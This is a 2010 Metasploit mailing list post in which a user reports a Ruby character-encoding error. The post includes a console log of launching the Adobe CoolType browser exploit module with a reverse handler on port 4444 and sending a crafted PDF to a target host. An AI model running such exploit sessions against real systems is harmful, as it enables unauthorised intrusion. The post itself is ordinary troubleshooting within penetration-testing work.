Metasploit mailing list archives

Bug in ruby? incompatible character encodings: US-ASCII and ASCII-8BIT


From: Brian <briaar () gmail com>
Date: Tue, 28 Dec 2010 20:21:05 -0700

Using: http://updates.metasploit.com/data/releases/framework-3.5.1-linux-x86_64.run
on a fresh 64 bit ubuntu 10.04 server.

Have tested w/ multiple browsers (IE + Chrome).

I have confirmed this exploit works fine on my local 32bit dev vm.

               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 639 exploits - 320 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11441 updated today (2010.12.29)

msf > use windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL
that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this
exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(adobe_cooltype_sing) > set URIPATH /
URIPATH => /
msf exploit(adobe_cooltype_sing) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on XXX.XXX.XXX.XXX:4444
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://XXX.XXX.XXX.XXX:8080/
msf exploit(adobe_cooltype_sing) > [*] Server started.
[*] Sending crafted PDF to YYY.YYY.YYY.YYY:49187
[-] Exception handling request: incompatible character encodings:
US-ASCII and ASCII-8BIT

msf exploit(adobe_cooltype_sing) > exit

[*] Server stopped.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: